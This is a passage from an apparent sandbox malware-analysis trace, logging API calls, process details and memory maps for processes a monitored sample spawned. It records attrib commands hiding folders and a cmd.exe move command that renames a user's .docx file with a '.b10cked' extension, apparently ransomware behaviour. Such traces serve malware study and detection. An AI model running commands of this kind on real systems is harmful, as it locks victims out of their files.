_BufferCount=0x13, _Format="%08X", _ArgList=0x1cef7c | out: _Buffer="00000000") returned 8 [0134.871] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0134.871] GetEnvironmentStringsW () returned 0x2137f8* [0134.871] FreeEnvironmentStringsW (penv=0x2137f8) returned 1 [0134.871] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0134.871] GetEnvironmentStringsW () returned 0x2137f8* [0134.872] FreeEnvironmentStringsW (penv=0x2137f8) returned 1 [0134.872] DeleteProcThreadAttributeList (in: lpAttributeList=0x1cefd4 | out: lpAttributeList=0x1cefd4) [0134.872] _get_osfhandle (_FileHandle=1) returned 0x7 [0134.872] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0134.872] _get_osfhandle (_FileHandle=1) returned 0x7 [0134.872] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0134.872] _get_osfhandle (_FileHandle=0) returned 0x3 [0134.872] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0134.872] SetConsoleInputExeNameW () returned 0x1 [0134.872] GetConsoleOutputCP () returned 0x1b5 [0134.872] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0134.872] SetThreadUILanguage (LangId=0x0) returned 0x409 [0134.872] exit (_Code=0) Process: id = "130" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16740" os_pid = "0xc64" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "129" os_parent_pid = "0xc10" cmd_line = "attrib -r -s -h \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\desktop.ini\" " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 13347 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 13348 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 13349 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 13350 start_va = 0x170000 end_va = 0x1affff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 13351 start_va = 0xb10000 end_va = 0xb16fff entry_point = 0xb10000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 13352 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 13353 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 13354 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 13355 start_va = 0x7ffdc000 end_va = 0x7ffdcfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Region: id = 13356 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 13357 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 13358 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 13359 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 13360 start_va = 0x250000 end_va = 0x34ffff entry_point = 0x0 region_type = private name = "private_0x0000000000250000" filename = "" Region: id = 13361 start_va = 0x4e0000 end_va = 0x4effff entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 13362 start_va = 0x6e440000 end_va = 0x6e45cfff entry_point = 0x6e440000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 13363 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 13364 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 13365 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 13366 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 13367 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 13368 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 13369 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 13370 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 13371 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 13372 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 13373 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 13374 start_va = 0x350000 end_va = 0x417fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000350000" filename = "" Region: id = 13375 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 13376 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 187 os_tid = 0xc20 Process: id = "131" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16740" os_pid = "0xc30" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "129" os_parent_pid = "0xc10" cmd_line = "attrib +h \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\\desktop.ini\" " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 13493 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 13494 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 13495 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 13496 start_va = 0x210000 end_va = 0x24ffff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 13497 start_va = 0xb30000 end_va = 0xb36fff entry_point = 0xb30000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 13498 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 13499 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 13500 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 13501 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 13502 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 13503 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 13504 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 13505 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 13506 start_va = 0xf0000 end_va = 0x1effff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 13507 start_va = 0x410000 end_va = 0x41ffff entry_point = 0x0 region_type = private name = "private_0x0000000000410000" filename = "" Region: id = 13508 start_va = 0x6e440000 end_va = 0x6e45cfff entry_point = 0x6e440000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 13509 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 13510 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 13511 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 13512 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 13513 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 13514 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 13515 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 13516 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 13517 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 13518 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 13519 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 13520 start_va = 0x250000 end_va = 0x317fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 13521 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 13522 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 188 os_tid = 0xc34 Process: id = "132" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16740" os_pid = "0xc00" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "129" os_parent_pid = "0xc10" cmd_line = "attrib +h \"C:\\Users\\EEBsYm5\\Desktop\\GbkI\\FTTFHT~1\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 13523 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 13524 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 13525 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 13526 start_va = 0x210000 end_va = 0x24ffff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 13527 start_va = 0x5a0000 end_va = 0x5a6fff entry_point = 0x5a0000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 13528 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 13529 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 13530 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 13531 start_va = 0x7ffdb000 end_va = 0x7ffdbfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 13532 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 13533 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 13534 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 13535 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 13536 start_va = 0x130000 end_va = 0x13ffff entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 13537 start_va = 0x3d0000 end_va = 0x4cffff entry_point = 0x0 region_type = private name = "private_0x00000000003d0000" filename = "" Region: id = 13538 start_va = 0x6e440000 end_va = 0x6e45cfff entry_point = 0x6e440000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 13539 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 13540 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 13541 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 13542 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 13543 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 13544 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 13545 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 13546 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 13547 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 13548 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 13549 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 13550 start_va = 0x140000 end_va = 0x207fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000140000" filename = "" Region: id = 13551 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 13552 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 189 os_tid = 0xbfc Process: id = "133" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea166a0" os_pid = "0xbc4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\-V83XF~1.DOC\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\-V83XFbt5-FsW.docx.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 13565 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 13566 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 13567 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 13568 start_va = 0x110000 end_va = 0x20ffff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 13569 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 13570 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 13571 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 13572 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 13573 start_va = 0x7ffd4000 end_va = 0x7ffd4fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd4000" filename = "" Region: id = 13574 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 13791 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 13792 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 13793 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 13794 start_va = 0x330000 end_va = 0x42ffff entry_point = 0x0 region_type = private name = "private_0x0000000000330000" filename = "" Region: id = 13795 start_va = 0x620000 end_va = 0x62ffff entry_point = 0x0 region_type = private name = "private_0x0000000000620000" filename = "" Region: id = 13796 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 13797 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 13798 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 13799 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 13800 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 13801 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 13802 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 13803 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 13804 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 13805 start_va = 0x210000 end_va = 0x2d7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000210000" filename = "" Region: id = 13806 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 13807 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 13808 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 13809 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 13810 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 13811 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 13812 start_va = 0x430000 end_va = 0x530fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000430000" filename = "" Region: id = 13813 start_va = 0x630000 end_va = 0x122ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 13814 start_va = 0x1230000 end_va = 0x1392fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001230000" filename = "" Thread: id = 190 os_tid = 0xb8c [0135.531] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x20fedc | out: lpSystemTimeAsFileTime=0x20fedc*(dwLowDateTime=0x8ab7e040, dwHighDateTime=0x1d440a9)) [0135.531] GetCurrentProcessId () returned 0xbc4 [0135.531] GetCurrentThreadId () returned 0xb8c [0135.531] GetTickCount () returned 0x2ae57 [0135.531] QueryPerformanceCounter (in: lpPerformanceCount=0x20fed4 | out: lpPerformanceCount=0x20fed4*=19232003466) returned 1 [0135.531] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0135.532] __set_app_type (_Type=0x1) [0135.532] __p__fmode () returned 0x76b331f4 [0135.532] __p__commode () returned 0x76b331fc [0135.532] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0135.532] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0135.532] GetCurrentThreadId () returned 0xb8c [0135.532] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xb8c) 